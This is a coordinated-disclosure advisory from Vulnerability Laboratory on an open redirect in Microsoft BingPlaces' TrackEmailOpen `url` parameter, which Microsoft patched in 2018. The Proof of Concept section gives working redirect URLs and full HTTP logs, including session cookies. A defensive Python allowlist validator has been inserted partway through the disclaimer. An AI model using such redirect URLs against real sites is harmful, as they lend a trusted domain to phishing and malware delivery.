Document Title:
===============
Microsoft BingPlaces - TrackEmailOpen (url) Open Redirect

Date:
=====
2018-11-19

References:
===========
https://www.vulnerability-lab.com/get_content.php?id=2167

MSRC ID: CRM:0461060024

Acknowledgements: https://technet.microsoft.com/en-us/security/cc308589

Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2018/11/16/microsoft-bingplaces-business-url-redirect-vulnerability

VL-ID:
=====
2167

Common Vulnerability Scoring System:
====================================
3.1

Vulnerability Class:
====================
Redirect or Open Redirect

Introduction:
=============
Bing Places for Business is a Bing portal that enables local business owners to add a listing for their business on Bing.

(Copy of the Homepage: https://www.bingplaces.com/ )

Abstract:
=========
The Vulnerability Laboratory core research team discovered an open redirect web vulnerability in the official Microsoft BingPlaces online service web-application.

Report-Timeline:
================
2018-08-01: Researcher Notification & Coordination (Security Researcher)
2018-08-02: Vendor Notification (MSRC - Security Department)
2018-08-27: Vendor Response/Feedback (MSRC - Security Department)
2018-11-11: Vendor Fix/Patch (Microsoft Service Developer Team)
2018-11-12: Security Acknowledgements (MSRC - Security Department)
2018-11-19: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
Microsoft Corporation
Product: BingPlaces Business - Bing (Web-Application) v2018 Q4

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
An open redirect web vulnerability has been discovered in the official Microsoft BingPlaces Business online service web-application. The issue allows remote attackers to redirect client-side requests to external malformed contents or malicious sources such as attacker-controlled webpages.
The open redirect vulnerability is located in the `url` parameter of the `TrackEmailOpen` function in the `StatsTracker` module. Remote attackers are able to redirect client-side GET requests because the `url` parameter is not restricted. The attack vector is non-persistent and the request method is GET. The vulnerability is a classic open redirect. Successful exploitation results in external redirects to malicious sources such as phishing pages, spoofed url web contents or external malware pages.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] StatsTracker

Vulnerable Function(s):
[+] TrackEmailOpen

Vulnerable Parameter(s):
[+] url

Proof of Concept:
=================
The open redirect web vulnerability can be exploited by remote attackers without a privileged application user account and with low user interaction. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.
PoC: Example
https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=[External Redirect]

PoC: Exploitation
https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=https%3A%2F%2Fwww.vulnerability-lab.com%2F
https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=https%3A%2F%2Fwww.vulnerability-lab.com%2Ftest.js

--- PoC Session Logs (GET) ---
https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=https%3A%2F%2Fwww.vulnerability-lab.com%2F
Host: www.bingplaces.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: ASP.NET_SessionId=sulxsx3e2sznpufzpogp4ywp; BingPlacesCulture=en-US
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://www.vulnerability-lab.com/
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Content-Type-Options: nosniff
X-Powered-By: ASP.NET
Date: Thu, 16 Aug 2018 07:42:17 GMT
Content-Length: 151

https://www.vulnerability-lab.com/
Host: www.vulnerability-lab.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=kdsucolj3rarbg4qmois3tmr07
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Thu, 16 Aug 2018 07:42:16 GMT
Content-Length: 96002

Reference(s):
https://www.bingplaces.com/
https://www.bingplaces.com/StatsTracker/
https://www.bingplaces.com/StatsTracker/TrackEmailOpen

Solution:
=========
The open redirect vulnerability can be patched by restricting the contents accepted in the `url` parameter of the TrackEmailOpen function. Restrict the requests to local paths or an allowlist of hosts so that external redirects are denied.

Risk:
=====
The security risk of the open redirect vulnerability in the BingPlaces online service web-application is estimated as medium.

Credits:
========
Benjamin K.M. [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer:
===========
The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and fitness for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
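As an added illustration of the fix the Solution section describes (this is not code from the advisory or from Microsoft, and it is written in Python rather than the service's ASP.NET stack), the following validator accepts a `url` parameter only when it is a local path or an http(s) URL on an allowlisted host and otherwise falls back to a local page; the allowlist contents and the fallback path are assumptions.

```python
from urllib.parse import urlsplit, urlunsplit, unquote

# Hosts the tracker may redirect to. Constructed for this example; the
# real BingPlaces allowlist is not known from the advisory.
ALLOWED_HOSTS = {"www.bingplaces.com", "bingplaces.com"}
FALLBACK = "/"  # assumed local landing page used when the target is rejected


def safe_redirect_target(url: str, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Return a redirect target that is either a same-origin path or an
    https URL on an allowlisted host; anything else maps to FALLBACK.

    The value is rebuilt from parsed components rather than echoed back, so
    browser quirks such as "///host" or backslashes cannot smuggle a foreign
    host through a check that only looks at the first character."""
    if not url:
        return FALLBACK
    # Decode one layer of percent-encoding (the PoC sends https%3A%2F%2F...)
    # and treat backslashes as slashes, as browsers do for special schemes.
    candidate = unquote(url.strip()).replace("\\", "/")
    parts = urlsplit(candidate)

    if parts.scheme:
        # Absolute URL: only http(s), no userinfo, host must be allowlisted.
        if parts.scheme.lower() not in ("http", "https"):
            return FALLBACK                     # javascript:, data:, ...
        if parts.username is not None or parts.password is not None:
            return FALLBACK                     # https://www.bingplaces.com@evil
        host = (parts.hostname or "").lower()
        if host not in allowed_hosts:           # exact match, not suffix match
            return FALLBACK
        return urlunsplit(("https", parts.netloc.lower(), parts.path or "/",
                           parts.query, parts.fragment))

    if parts.netloc:
        return FALLBACK                         # scheme-relative //evil.example

    # Relative target: require a single leading slash and re-emit only the
    # path/query/fragment, which keeps the redirect on the current origin.
    path = parts.path
    if not path.startswith("/") or path.startswith("//"):
        return FALLBACK
    return urlunsplit(("", "", path, parts.query, parts.fragment))


if __name__ == "__main__":
    for sample in ("/Dashboard", "https%3A%2F%2Fwww.vulnerability-lab.com%2F",
                   "//evil.example/", "https://www.bingplaces.com/Dashboard?x=1"):
        print(f"{sample!r:55} -> {safe_redirect_target(sample)!r}")
```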
Domains:
www.vulnerability-lab.com
www.vuln-lab.com
www.vulnerability-db.com

Services:
magazine.vulnerability-lab.com
paste.vulnerability-db.com
infosec.vulnerability-db.com

Social:
twitter.com/vuln_lab
facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab

Feeds:
vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php

Programs:
vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team and the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™